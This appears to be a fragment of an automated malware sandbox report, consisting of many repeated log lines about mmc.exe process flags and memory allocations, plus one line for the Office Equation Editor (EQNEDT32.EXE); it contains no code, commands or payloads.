Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Memory allocated: 37A0000 memory commit \| memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Memory allocated: 3FD0000 memory commit \| memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Memory allocated: 28F0000 memory commit \| memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Memory allocated: 3B80000 memory commit \| memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Memory allocated: 3EE0000 memory commit \| memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Memory allocated: 6B10000 memory commit \| memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Memory allocated: 3E40000 memory commit \| memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Memory allocated: 3F70000 memory commit \| memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Memory allocated: 4310000 memory commit \| memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Memory allocated: 4350000 memory commit \| memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Memory allocated: 6580000 memory commit \| memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Memory allocated: 3E70000 memory commit \| memory reserve \| memory write watch
Source: C:\Windows\System32\mmc.exe	Memory allocated: 29F0000 memory commit \| memory reserve \| memory write watch
Source: C:\Windows\System32\mmc.exe	Memory allocated: 40D0000 memory commit \| memory reserve \| memory write watch
Source: C:\Windows\System32\mmc.exe	Memory allocated: 4350000 memory commit \| memory reserve \| memory write watch
Source: C:\Windows\System32\mmc.exe	Memory allocated: 4B60000 memory commit \| memory reserve \| memory write watch
Source: C:\Windows\System32\mmc.exe	Memory allocated: 4070000 memory commit \| memory reserve \| memory write watch
Source: C:\Windows\System32\mmc.exe	Memory allocated: 26B0000 memory commit \| memory reserve \| memory write watch
Source: C:\Windows\System32\mmc.exe	Memory allocated: 3A60000 memory commit \| memory reserve \| memory write watch
Source: C:\Windows\System32\mmc.exe	Memory allocated: 3AA0000 memory commit \| memory reserve \| memory write watch
Source: C:\Windows\System32\mmc.exe	Memory allocated: 6A90000 memory commit \| memory reserve \| memory write watch
Source: C:\Windows\System32\mmc.exe	Memory allocated: 40F0000 memory commit \| memory reserve \| memory write watch
Source: C:\Windows\System32\mmc.exe	Memory allocated: 2870000 memory commit \| memory reserve \| memory write watch
Source: C:\Windows\System32\mmc.exe	Memory allocated: 3AD0000 memory commit \| memory reserve \| memory write watch
Source: C:\Windows\System32\mmc.exe	Memory allocated: 3C20000 memory commit \| memory reserve \| memory write watch
Source: C:\Windows\System32\mmc.exe	Memory allocated: 6440000 memory commit \| memory reserve \| memory write watch
Source: C:\Windows\System32\mmc.exe	Memory allocated: 3F80000 memory commit \| memory reserve \| memory write watch
Source: C:\Windows\System32\mmc.exe	Memory allocated: 2FC0000 memory commit \| memory reserve \| memory write watch
Source: C:\Windows\System32\mmc.exe	Memory allocated: 4180000 memory commit \| memory reserve \| memory write watch
Source: C:\Windows\System32\mmc.exe	Memory allocated: 42A0000 memory commit \| memory reserve \| memory write watch
Source: C:\Windows\System32\mmc.exe	Memory allocated: 6950000 memory commit \| memory reserve \| memory write watch
Source: C:\Windows\System32\mmc.exe	Memory allocated: 3F80000 memory commit \| memory reserve \| memory write watch
Source: C:\Windows\System32\mmc.exe	Memory allocated: 3240000 memory commit \| memory reserve \| memory write watch
Source: C:\Windows\System32\mmc.exe	Memory allocated: 40D0000 memory commit \| memory reserve \| memory write watch
Source: C:\Windows\System32\mmc.exe	Memory allocated: 41D0000 memory commit \| memory reserve \| memory write watch
Source: C:\Windows\System32\mmc.exe	Memory allocated: 6A00000 memory commit \| memory reserve \| memory write watch
Source: C:\Windows\System32\mmc.exe	Memory allocated: 3570000 memory commit \| memory reserve \| memory write watch
Source: C:\Windows\System32\mmc.exe	Memory allocated: 2770000 memory commit \| memory reserve \| memory write watch
Source: C:\Windows\System32\mmc.exe	Memory allocated: 29B0000 memory commit \| memory reserve \| memory write watch
Source: C:\Windows\System32\mmc.exe	Memory allocated: 2A70000 memory commit \| memory reserve \| memory write watch
Source: C:\Windows\System32\mmc.exe	Memory allocated: 6AB0000 memory commit \| memory reserve \| memory write watch
Source: C:\Windows\System32\mmc.exe	Memory allocated: 40D0000 memory commit \| memory reserve \| memory write watch
Source: C:\Windows\System32\mmc.exe	Memory allocated: 28F0000 memory commit \| memory reserve \| memory write watch
Source: C:\Windows\System32\mmc.exe	Memory allocated: 3B50000 memory commit \| memory reserve \| memory write watch
Source: C:\Windows\System32\mmc.exe	Memory allocated: 3C10000 memory commit \| memory reserve \| memory write watch
Source: C:\Windows\System32\mmc.exe	Memory allocated: 6370000 memory commit \| memory reserve \| memory write watch
Source: C:\Windows\System32\mmc.exe	Memory allocated: 4010000 memory commit \| memory reserve \| memory write watch
Source: C:\Windows\System32\mmc.exe	Memory allocated: 2770000 memory commit \| memory reserve \| memory write watch
Source: C:\Windows\System32\mmc.exe	Memory allocated: 3A40000 memory commit \| memory reserve \| memory write watch
